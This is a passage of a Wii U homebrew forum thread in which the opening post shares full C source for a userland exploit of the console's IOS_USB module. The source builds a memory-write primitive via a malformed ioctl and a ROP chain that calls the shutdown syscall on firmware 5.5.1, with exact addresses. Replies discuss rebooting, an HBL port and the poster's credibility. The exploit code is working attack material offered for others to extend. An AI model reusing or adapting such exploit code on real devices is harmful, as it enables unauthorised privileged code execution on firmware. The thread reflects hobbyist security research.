ROP from within IOS_USB (5.5.1)

Discussion in 'Wii U - Hacking & Backup Loaders' started by Hillary_Clinton, Oct 8, 2016.

  1. Hillary_Clinton
    OP

    Hillary_Clinton Member

    Newcomer
    23
    129
    Apr 23, 2016
    United States
    IOSU kernel exploit demonstrated here. This is just for people who would like to experiment inside IOSU. You can ignore the text below; it's old.

    Hi guys. Below is an implementation of the userland IOSU exploit on the wiki. It demonstrates a simple ROP chain which will call the shutdown syscall from within IOS_USB and restart your console. (5.5.1 only.) I'm posting this here in the hope that someone might build on this and get privileged execution on the ARM, perhaps by implementing the IOS_CreateThread exploit that is detailed on the wiki, and then share it publicly.

    How this works is described in detail on the wiki but you might like to know that the ROP chain overwrites the return address for the subroutine at 0x1011D968. The return address is at 0x1016AD40. The thread's stack is within the range [0x1015AE50, 0x1016AE50). You might also like to know that MEM1 is mapped R/W on the PPC side at 0xF4000000 and on the ARM side at 0x00000000.

    Updated code here. The rest of the old post:

    The trouble I'm having right now is I am unable to construct a larger ROP chain without it being overwritten between calls to write32. I've tried lots of different ways of moving the stack pointer around but I haven't had much luck. And of course I know there are people who have already achieved privileged execution on the ARM, but this is for the people who are waiting.

    Here's what I have.

    loader.c:
    Code:
    #include "loader.h"
    
    void _start()
    {
        /* Load a good stack */
        asm(
            "lis %r1, 0x1ab5 ;"
            "ori %r1, %r1, 0xd138 ;"
        );
    
        unsigned int coreinit_handle;
        OSDynLoad_Acquire("coreinit.rpl", &coreinit_handle);
    
        void(*_Exit)();
        OSDynLoad_FindExport(coreinit_handle, 0, "_Exit", &_Exit);
    
        void(*OSSleepTicks)(long long x);
        OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks);
    
        int(*IOS_Open)(char *path, unsigned int mode);
        OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open);
    
        int(*IOS_Close)(int fd);
        OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close);
    
        int du0h = IOS_Open("/dev/uhs/0", 0);
    
        //int ret = write32(du0h, 0x1016BE50 - 0xF0, 0x1012EE5C); // reset syscall
    
    #define CHAIN_START 0x1016AD40
    #define SHUTDOWN 0x1012EE4C
    #define SIMPLE_RETURN 0x101014E4
    
        int ret;
    
        ret = write32(du0h, CHAIN_START + 0x4, SIMPLE_RETURN);
        ret = write32(du0h, CHAIN_START + 0x8, SHUTDOWN);
    
        // the following line will trigger the ROP chain
        ret = write32(du0h, CHAIN_START, SIMPLE_RETURN);
    
        IOS_Close(du0h);
    
        _Exit();
    
        while (1);
    }
    
    int write32(int dev_uhs_0_handle, int arm_addr, int val) {
    
        unsigned int coreinit_handle;
        OSDynLoad_Acquire("coreinit.rpl", &coreinit_handle);
    
        int(*IOS_Ioctl)(int fd, unsigned int request, void *input_buffer,
            unsigned int input_buffer_len, void *output_buffer, unsigned int output_buffer_len);
        void(*DCFlushRange)(void *addr, unsigned int len);
        void(*DCInvalidateRange)(void *addr, unsigned int len);
        void(*OSSleepTicks)(long long x);
        OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl);
        OSDynLoad_FindExport(coreinit_handle, 0, "DCFlushRange", &DCFlushRange);
        OSDynLoad_FindExport(coreinit_handle, 0, "DCInvalidateRange", &DCInvalidateRange);
        OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks);
    
        int* pretend_root_hub = (int*)0xF5003ABC;
        int *ayylmao = (int*)0xF4500000;
    
        ayylmao[8] = (int)ayylmao - 0xF4000000;
        ayylmao[5] = 1;
        ayylmao[520] = arm_addr - 24; // the address to be overwritten, minus 24 bytes.
    
        pretend_root_hub[33] = (int)ayylmao - 0xF4000000;
        pretend_root_hub[78] = 0;
    
        DCFlushRange(pretend_root_hub + 33, 200);
        DCInvalidateRange(pretend_root_hub + 33, 200);
        DCFlushRange(ayylmao, 521 * 4);
        DCInvalidateRange(ayylmao, 521 * 4);
        OSSleepTicks(0x200000);
    
        int root_hub_index = -(0xBEA2C); // gets IOS_USB to read from the middle of MEM1
    
        int request_buffer[] = { root_hub_index, val };
        int output_buffer[32];
        int ret = IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
        return ret;
    }
    loader.h:
    Code:
    #ifndef LOADER_H
    #define LOADER_H
    
    #include "../../../libwiiu/src/coreinit.h"
    #include "../../../libwiiu/src/socket.h"
    #include "../../../libwiiu/src/uhs.h"
    #include "../../../libwiiu/src/types.h"
    
    /* Application start */
    void _start();
    int write32(int, int, int);
    
    #endif /* LOADER_H */
    
     
    Last edited by Hillary_Clinton, Oct 14, 2016


  2. Filo97

    Filo97 Zelda's totally my sister! Not lying!

    Member
    3,637
    1,209
    Oct 8, 2015
    Italy
    Hyrule Castle
    Wish so much I could have this homebrew; sometimes rebooting my console is the only thing I want to do.
     
  3. thisisallowed

    thisisallowed 中国御宅族

    Member
    488
    114
    Oct 8, 2015
    China
    Jinan, Shandong
    But it reboots it USING IOSU!!!!111
     
  4. CreeperMario

    CreeperMario GBAtemp Advanced Fan

    Member
    616
    364
    Jun 18, 2016
    Australia
    OSv10 v15702
    inb4 spam posts

    TAKE NOTE PEOPLE: THIS IS NOT AN IOSU EXPLOIT!
    It demonstrates code execution on the IOSU processor that can eventually lead to a kernel attack on the IOSU, but right now all it does is cold-boot (I think?) your console.
    It is like Browserhax - useful for basic stuff but you want a kernel exploit in order to have backups, HBL and extended memory access.
     
  5. thisisallowed

    thisisallowed 中国御宅族

    Member
    488
    114
    Oct 8, 2015
    China
    Jinan, Shandong
    You can't use this at all, pretty much.
    You need to use the keksploit to do anything. Other than rebooting.
     
  6. Voxel

    Voxel Clumsy Coder

    Member
    GBAtemp Patron
    5,183
    5,846
    Jun 27, 2015
    United Kingdom
    England, UK
    Huh, neat; this actually reboots my Wii U! Don't think I would use it in everyday use, but good job demonstrating Userland IOSU access. :)
     
  7. Filo97

    Filo97 Zelda's totally my sister! Not lying!

    Member
    3,637
    1,209
    Oct 8, 2015
    Italy
    Hyrule Castle
    can i have a .elf of this? there are times when i just want to reboot console
     
  8. Voxel

    Voxel Clumsy Coder

    Member
    GBAtemp Patron
    5,183
    5,846
    Jun 27, 2015
    United Kingdom
    England, UK
    I don't think you can compile it as .elf, but I have the .mp4 (which is probably faster to execute anyway) if you want that.
     
  9. Filo97

    Filo97 Zelda's totally my sister! Not lying!

    Member
    3,637
    1,209
    Oct 8, 2015
    Italy
    Hyrule Castle
    no, thanks
     
  10. Voxel

    Voxel Clumsy Coder

    Member
    GBAtemp Patron
    5,183
    5,846
    Jun 27, 2015
    United Kingdom
    England, UK
    Why do you want the .elf then? Is it just so it matches with your collection of other elf files?
     
  11. Filo97

    Filo97 Zelda's totally my sister! Not lying!

    Member
    3,637
    1,209
    Oct 8, 2015
    Italy
    Hyrule Castle
    no, it's because sometimes i just don't feel like leaving hbl open in RAM while playing games like super mario maker or anything that goes online
     
  12. CreeperMario

    CreeperMario GBAtemp Advanced Fan

    Member
    616
    364
    Jun 18, 2016
    Australia
    OSv10 v15702
    If you want an HBL port (may or may not work) I might try this now. Just let me try the userland version on my console first...
     
  13. Filo97

    Filo97 Zelda's totally my sister! Not lying!

    Member
    3,637
    1,209
    Oct 8, 2015
    Italy
    Hyrule Castle
    yay!
     
  14. CreeperMario

    CreeperMario GBAtemp Advanced Fan

    Member
    616
    364
    Jun 18, 2016
    Australia
    OSv10 v15702
    HBL port complete (it actually worked on my first build, that's never happened before...)
    Run this file using HBL - it can be streamed via wiiload, SendELF or can be placed inside the sd:/wiiu/apps/iosu-reboot/ folder on your SD Card.

    Enjoy rebooting your console I guess...? (I had to zip it, GBATemp wouldn't let me upload the raw ELF)

    @QuarkTheAwesome does this mean that we can add auto-rebooting to an exception handler? (You mentioned being able to return to the main thread before, but with limitations I can't remember).
     


    Last edited by CreeperMario, Oct 8, 2016
  15. Filo97

    Filo97 Zelda's totally my sister! Not lying!

    Member
    3,637
    1,209
    Oct 8, 2015
    Italy
    Hyrule Castle
    thx
     
  16. Cyan

    Cyan GBATemp's lurking knight

    Global Moderator
    18,076
    8,586
    Oct 27, 2002
    France
    Engine room, learning
    Go into Settings and exit. It soft-reboots the console when you exit and clears the hacks/HBL from memory.
     
  17. Filo97

    Filo97 Zelda's totally my sister! Not lying!

    Member
    3,637
    1,209
    Oct 8, 2015
    Italy
    Hyrule Castle
    ah so kinda like 3ds right?
     
  18. Cyan

    Cyan GBATemp's lurking knight

    Global Moderator
    18,076
    8,586
    Oct 27, 2002
    France
    Engine room, learning
    I guess the HBL version he posted will be faster than loading/exiting the settings menu ;)

    @CreeperMario :
    maybe you could include your sources to compile it for HBL?
    it's just a makefile?


    I added it to wikitemp.
     
  19. Phantom64

    Phantom64 Banned

    Banned
    581
    460
    Aug 18, 2015
    Saint Kitts and Nevis
    At this point I am waiting for an IOSU kernel exploit from Donald Trump.

    This is nonsense. Someone called Hillary Clinton, registered today, released something quite hacky. Suspicious.
     
  20. QuarkTheAwesome

    QuarkTheAwesome Working for Hugs

    Member
    788
    1,929
    Apr 19, 2015
    Australia
    Stuck in the PowerPC
    Awesome to see! I hope this doesn't mean you're giving up on kernel...
    Sorry I was less help lately, ARM ROP is tough to get my head around :3

    @CreeperMario, you'll have to explain that differently since I'm not really sure what you mean. The work I did allowed homebrew apps to run exception handlers on their main threads (albeit with screwed-up stacks) which is much less restrictive than the default behavior. Not sure how it ties in here.

    (Also I seem to have stopped getting tag notifications. Hrm.)